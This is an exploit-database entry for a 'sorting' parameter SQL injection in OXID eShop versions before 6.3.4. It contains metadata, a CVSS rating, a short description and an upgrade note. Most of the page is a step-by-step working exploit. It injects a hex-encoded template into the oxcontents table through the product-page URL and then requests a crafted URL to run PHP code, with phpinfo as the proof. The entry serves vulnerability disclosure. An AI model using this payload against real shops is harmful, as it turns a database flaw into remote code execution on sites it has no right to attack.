header-logo
Suggest Exploit
vendor:
OXID eShop
by:
VulnSpy
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: OXID eShop
Affected Version From: 6.x (prior to 6.3.4)
Affected Version To: 6.3.3
Patch Exists: YES
Related CWE: N/A
CPE: a:oxid_esales:oxid_eshop
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2019

OXID eShop 6.3.4 – ‘sorting’ SQL Injection

OXID eShop is vulnerable to a SQL Injection vulnerability in the 'sorting' parameter. By adding the 'sorting' parameter after the URL of an item detail page, an attacker can insert malicious PHP code into the database. This code can then be executed by accessing a specially crafted URL, which will display the PHPINFO page if exploited successfully.

Mitigation:

Upgrade to OXID eShop version 6.3.4 or later.
Source

Exploit-DB raw data:

# Exploit Title: OXID eShop 6.3.4 - 'sorting' SQL Injection
# Date: 2019-07-29
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.oxid-esales.com/
# Software Link: https://github.com/OXID-eSales/oxideshop_ce
# Version: Versions 6.x (prior to 6.3.4)
# Tested on: https://github.com/vsplate/dcenvs/tree/master/oxideshop_ce/6.3.3/dc
# CVE:

1. Click on any product item in the web page

```bash
e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html
```

2..Add `sorting` parameter after the URL of item detail ( Insert PHP code
to database via SQL injection )

```bash
e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert
into
oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION)

VALUES(0x313233343536,0x76756c6e73707964656d6f, 0x00, 1,
0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d,
1, 0x76756c6e73707964656d6f,
0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d,
0x434d53464f4c4445525f55534552494e464f, 0x00);%23
```

3.Accessing the following links triggers PHP code execution and will
display the PHPINFO page if exploited successfully.

```bash
http://***.vsgo.cloud/source/index.php?cl=content&oxloadid=vulnspydemo
```

Ref:
* https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/
* https://blog.ripstech.com/2019/oxid-esales-shop-software/
* https://bugs.oxid-esales.com/view.php?id=7002